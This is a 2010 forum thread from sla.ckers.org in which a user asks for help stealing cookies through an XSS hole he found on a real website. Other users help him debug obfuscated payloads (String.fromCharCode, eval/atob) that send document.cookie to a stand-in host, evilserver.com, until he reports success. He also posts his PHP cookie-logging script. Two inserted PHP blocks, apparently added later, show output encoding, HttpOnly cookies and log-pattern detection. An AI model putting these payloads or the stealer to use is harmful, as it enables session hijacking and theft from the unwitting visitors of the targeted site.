Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
[SOLVED] document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 06:53AM

Hi guys,

I found a website with an XSS vulnerability (for example: server.com). I inject the JavaScript into the index.php of a subdirectory (for example: /test/). So the (POST) form is located at: www.server.com/test/index.php.
I want to inject the following script: <script>document.location="http://www.evilserver.com/c.php?c=" + document.cookie;</script>
Because the form has addslashes(), I encrypt the script into: <script>document.location=String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 101, 118, 105, 108, 115, 101, 114, 118, 101, 114, 46, 99, 111, 109, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 32, 43, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101);</script>
When I execute it, I don't get redirected to evilserver.com but to: www.server.com/test/"http://www.evilserver.com/c.php?c=" + document.cookie;
How can I fix it?
Btw: c.php is a cookie stealer that puts everything of variable "c" into a text file.

Thanks in advance!
larsm99



Edited 1 time(s). Last edit at 03/02/2010 11:22AM by larsm99.
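As an added defender-side example (not code from the thread or from the site it describes), the following PHP shows why addslashes() does not stop a payload of the shape discussed above and what does: HTML-encoding with htmlspecialchars() and ENT_QUOTES, plus an HttpOnly session cookie that document.cookie cannot read. The cookie name, the form field name and the sample payload are assumptions constructed for this example.

```php
<?php
// Added example (not code from the thread): the weak escaping the thread
// describes beside what actually neutralises the payload.

// Defence in depth, set before any output: an HttpOnly cookie is still sent
// on requests but is invisible to document.cookie, so even a successful
// injection cannot read it. The cookie name "session" is an assumption.
setcookie('session', bin2hex(random_bytes(16)), [
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
    'path'     => '/',
]);

// Constructed sample in the shape of the payload discussed above.
$input = '<script>document.location=String.fromCharCode(104,116,116,112)+document.cookie;</script>';

// addslashes() only backslash-escapes the two quote characters, backslash
// and NUL. It is a legacy SQL-quoting helper, not an HTML encoder: this
// payload contains none of those characters, so it is reflected unchanged.
$weak = addslashes($input);
var_dump($weak === $input);                  // bool(true): nothing neutralised

// htmlspecialchars() with ENT_QUOTES turns < > & " ' into entities, so the
// browser renders text instead of executing a <script> element.
$safe = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
var_dump(strpos($safe, '<script>') === false);   // bool(true)
echo $safe, "\n";   // &lt;script&gt;document.location=...&lt;/script&gt;

// Every reflection of user input goes through the encoder, for example a
// form field echoed back on index.php (the field name is an assumption).
function render_field(string $value): string
{
    return '<input type="text" name="name" value="'
        . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '">';
}
echo render_field($input), "\n";
```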

Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 07:35AM

When using String.fromCharCode, you don't need to encode the " (34); the JavaScript doesn't like it.

http://www.xssed.com/archive/author=PaPPy/

Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 08:35AM

Thank you for your reply.

It actually works (it redirects me) but now I have another problem: it doesn't write the actual cookie of the user to the script, but just "document.cookie".

The cause is (I think) that it redirects me to:
www.evilserver.com/c.php?c= + document.cookie
and not to:
www.evilserver.com/c.php?c=HERETHECOOKIE!

How to fix this?

Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 09:57AM

<script>document.location=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 101, 118, 105, 108, 115, 101, 114, 118, 101, 114, 46, 99, 111, 109, 47, 99, 46, 112, 104, 112, 63, 99, 61) + document.cookie;</script>

try that (if you are putting it in a URL, you may have to URL encode the plus sign)

or try + and then String.fromCharCode and then encode document.cookie

http://www.xssed.com/archive/author=PaPPy/

Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 09:59AM

N/M, do what Pappy said



Edited 1 time(s). Last edit at 03/02/2010 10:01AM by thornmaker.

Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 10:18AM

Thanks for the fast replies, but it still doesn't work.
So, the following cases DON'T work:
1. Encoding URL and " + " and document.cookie
2. Encoding URL and document.cookie
3. Encoding URL only

In case 1: redirecting but it writes "document.cookie" to the file.
In case 2: no redirecting at all.
In case 3: redirecting but it writes "document.cookie" to the file.

Any more ideas? I don't get why it doesn't write the actual cookie.

BTW: This is my cookie stealer:
<?php
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('COOKIEFILE.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
<script type="text/javascript">window.location="http://www.server.com/";</script>



Edited 1 time(s). Last edit at 03/02/2010 10:24AM by larsm99.

Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 10:42AM

did you URL encode the + ?

[edit:] or just use something like this:
location=eval(atob(unescape('J2h0dHA6Ly93d3cuZXZpbHNlcnZlci5jb20vYy5waHA%2fYz0nK2RvY3VtZW50LmNvb2tpZQ==')))



Edited 2 time(s). Last edit at 03/02/2010 10:53AM by thornmaker.

Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 10:57AM

please look at my post before this one, I have tried all three cases mentioned there. So I also tried encoding the + ;)

@ your edit: That doesn't work because it uses addslashes(), so ' becomes \'



Edited 1 time(s). Last edit at 03/02/2010 10:59AM by larsm99.

Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 11:10AM

just tested this
<script>
document.location=String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,46,99,111,109) + document.cookie;
</script>

or this

<script>
var blah = String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,46,99,111,109) + document.cookie;
document.location=blah;
</script>

In Firefox they work, not sure about IE. If you are trying to test locally, it may not be including your cookies, as you don't have any...?

http://www.xssed.com/archive/author=PaPPy/

Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 11:13AM

can you post what you did for each of the 3 cases then because it's not clear what you did from your descriptions

edit: also, you never did the case: use String.fromCharCode on the URL... URL encode the + ... and do nothing to document.cookie.



Edited 1 time(s). Last edit at 03/02/2010 11:15AM by thornmaker.

Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 11:22AM

Thank you thornmaker and PaPPy!

It worked with using String.fromCharCode on the URL and URL encode on the + and nothing on document.cookie.

Ty!

Re: [SOLVED] document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 11:54AM

*high 5's thornmaker* good job

Just to explain a little about why you have to URL encode the + sign, hopefully people will search and we won't have to answer it again.

In the URL bar, if you just place a + sign in it, the browser/server interprets it as a space. But if you URL encode it to its equivalent %2B, the browser/server will decode it correctly.

I can't remember if it's the browser or the webserver, but you should at least understand why it's happening.

http://www.xssed.com/archive/author=PaPPy/
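To illustrate the point about + versus %2B from a log-review angle, here is an added PHP example (not code from the thread) that decodes constructed query strings the way PHP builds $_GET, shows the literal + turning into a space while %2B survives, and flags the exfiltration markers seen in this thread across the raw, RFC 3986-decoded and form-decoded views of a query. The sample query strings and the function names are constructed for this example.

```php
<?php
// Added example: "+" vs "%2B" in a query string, and a log-review check that
// decodes the way the application would before matching patterns.

// Decode a raw query string exactly as PHP does when it builds $_GET
// (application/x-www-form-urlencoded rules: "+" means space, "%2B" means "+").
function decode_query(string $rawQuery): array
{
    parse_str($rawQuery, $params);
    return $params;
}

// Markers from the payloads discussed in the thread, matched against three
// views of the query so that encoding in any one layer still surfaces.
function flag_request(string $rawQuery): array
{
    $views = [
        'raw'  => $rawQuery,
        'rfc'  => rawurldecode($rawQuery),   // %XX decoded, "+" stays literal
        'form' => urldecode($rawQuery),      // %XX decoded, "+" becomes space
    ];
    $patterns = [
        'fromCharCode' => '/String\.fromCharCode\s*\(/i',
        'cookie_read'  => '/document\.cookie/i',
        'script_tag'   => '/<\s*script/i',
    ];
    $hits = [];
    foreach ($patterns as $label => $re) {
        foreach ($views as $view) {
            if (preg_match($re, $view)) {
                $hits[] = $label;
                break;
            }
        }
    }
    return $hits;
}

// Constructed samples: the first pair shows the "+" problem from the thread.
$literal = decode_query('c=a+b');
$encoded = decode_query('c=a%2Bb');
var_dump($literal['c']);   // string(3) "a b"  <- literal "+" decoded as space
var_dump($encoded['c']);   // string(3) "a+b"  <- "%2B" decoded as "+"

// Constructed query strings as they would appear in a web server access log.
$logged = [
    'name=%3Cscript%3Edocument.location%3DString.fromCharCode(104)%2Bdocument.cookie%3C%2Fscript%3E',
    'q=shoes+and+socks',
];
foreach ($logged as $qs) {
    echo $qs, ' => ', implode(',', flag_request($qs)) ?: 'clean', "\n";
}
// first line  => fromCharCode,cookie_read,script_tag ("<script" only after decoding)
// second line => clean
```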

Re: [SOLVED] document.location behind URL?
Posted by: lightos
Date: March 02, 2010 01:58PM

PaPPy Wrote:
-------------------------------------------------------
> I can't remember if it's the browser or the
> webserver, but you should at least understand why
> it's happening

The browser.

Re: [SOLVED] document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 02:53PM

I knew it, I shouldn't have second-guessed myself.

http://www.xssed.com/archive/author=PaPPy/
